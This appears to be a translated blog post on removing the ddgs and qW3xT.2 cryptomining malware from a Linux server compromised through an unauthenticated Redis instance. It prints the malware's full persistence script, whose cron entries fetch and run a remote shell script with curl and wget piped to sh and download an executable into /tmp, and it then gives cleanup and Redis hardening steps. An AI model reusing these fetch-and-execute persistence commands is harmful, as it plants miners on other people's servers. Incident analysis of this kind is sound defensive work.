A practical record of handling the ddgs and qW3xT.2 mining viruses implanted in Linux servers

Preface

With the crazy speculation of virtual currency, mining viruses have become one of the most frequently used attack methods by criminals. Virus spreaders can use personal computers or servers to mine. The specific phenomena are high computer CPU usage, a sudden drop in the available space of the C drive, increased computer temperature, increased fan noise and other problems.

This article mainly introduces the treatment methods of DDGS and qW3xT.2 mining viruses implanted in Linux. Let’s take a look at the detailed introduction.

Phenomenon after being invaded:

Two abnormal processes, qW3xT.2 and ddgs, were found. They consumed a high CPU and reappeared after a while after being killed.

After killing these two abnormal processes, the following processes were seen after a while:

First, the scheduled task in /etc/sysconfig/crotnab did not find the scheduled script, and entered crontab -e to find the scheduled task.

*/5 * * * * curl -fsSL http://149.56.106.215:8000/i.sh | sh

<span style="font-size: 15px;">I checked that 149.56.106.215 is in the United States, and the content of the i.sh script is as follows:</span>

export PATH=$PATH:/bin:/usr/bin:/usr/local/bin:/usr/sbin
echo "" > /var/spool/cron/root
echo "*/15 * * * * curl -fsSL http://149.56.106.215:8000/i.sh | sh" >> /var/spool/cron/root
echo "*/15 * * * * wget -q -O- http://149.56.106.215:8000/i.sh | sh" >> /var/spool/cron/root
mkdir -p /var/spool/cron/crontabs
echo "" > /var/spool/cron/crontabs/root
echo "*/15 * * * * curl -fsSL http://149.56.106.215:8000/i.sh | sh" >> /var/spool/cron/crontabs/root
echo "*/15 * * * * wget -q -O- http://149.56.106.215:8000/i.sh | sh" >> /var/spool/cron/crontabs/root
ps auxf | grep -v grep | grep /tmp/ddgs.3013 || rm -rf /tmp/ddgs.3013
if [ ! -f "/tmp/ddgs.3013" ]; then
 wget -q http://149.56.106.215:8000/static/3013/ddgs.$(uname -m) -O /tmp/ddgs.3013
 curl -fsSL http://149.56.106.215:8000/static/3013/ddgs.$(uname -m) -o /tmp/ddgs.3013
fi
chmod +x /tmp/ddgs.3013 && /tmp/ddgs.3013

ps auxf | grep -v grep | grep Circle_MI | awk '{print $2}' | xargs kill
ps auxf | grep -v grep | grep get.bi-chi.com | awk '{print $2}' | xargs kill
ps auxf | grep -v grep | grep hashvault.pro | awk '{print $2}' | xargs kill
ps auxf | grep -v grep | grep nanopool.org | awk '{print $2}' | xargs kill
ps auxf | grep -v grep | grep minexmr.com | awk '{print $2}' | xargs kill
ps auxf | grep -v grep | grep /boot/efi/ | awk '{print $2}' | xargs kill
#ps auxf | grep -v grep | grep ddg.2006 | awk '{print $2}' | kill
#ps auxf | grep -v grep | grep ddg.2010 | awk '{print $2}' | kill

Treatment method:

1. Delete crontab -e

*/5 * * * * curl -fsSL http://149.56.106.215:8000/i.sh | sh

2. Clear the password-free login content set by hackers in /root/.ssh/authorized_keys

3. Change the redis password

4. Modify the root and login account passwords

Safety Tips:

1. Configure the bind option to limit the IP that can connect to the Redis server, modify the default port 6379 of Redis, configure authentication, that is, AUTH, and set the password. The password will be saved in plain text in the Redis configuration file

2. Configure the rename-command configuration item "RENAME_CONFIG" so that even if there is unauthorized access, it will be more difficult for attackers to use the config command

3. If you can block the redis external network in the firewall

Intrusion method:

After collecting relevant information, we learned that the hacker was intruder due to the use of a redis vulnerability, no password was set or the password was too simple. For specific methods, please refer to

https://www.jb51.net/article/147375.htm

The reids password modification method is as follows:

redis-cli -h 127.0.0.1 -p 6379
config get requirepass ##Get the current password config set requirepass "yourpassword" ##Set the current password. After the service is restarted, it will be set to the default, that is, no password;

To make it permanent, open the redis configuration file redis.conf, find the requirepass value and change the password as follows:

requirepass yourpassword ##Note that there should be no spaces before the line

Summarize

The above is the full content of this article. I hope that the content of this article will have certain reference learning value for your study or work. If you have any questions, you can leave a message to communicate. Thank you for your support for 123WORDPRESS.COM.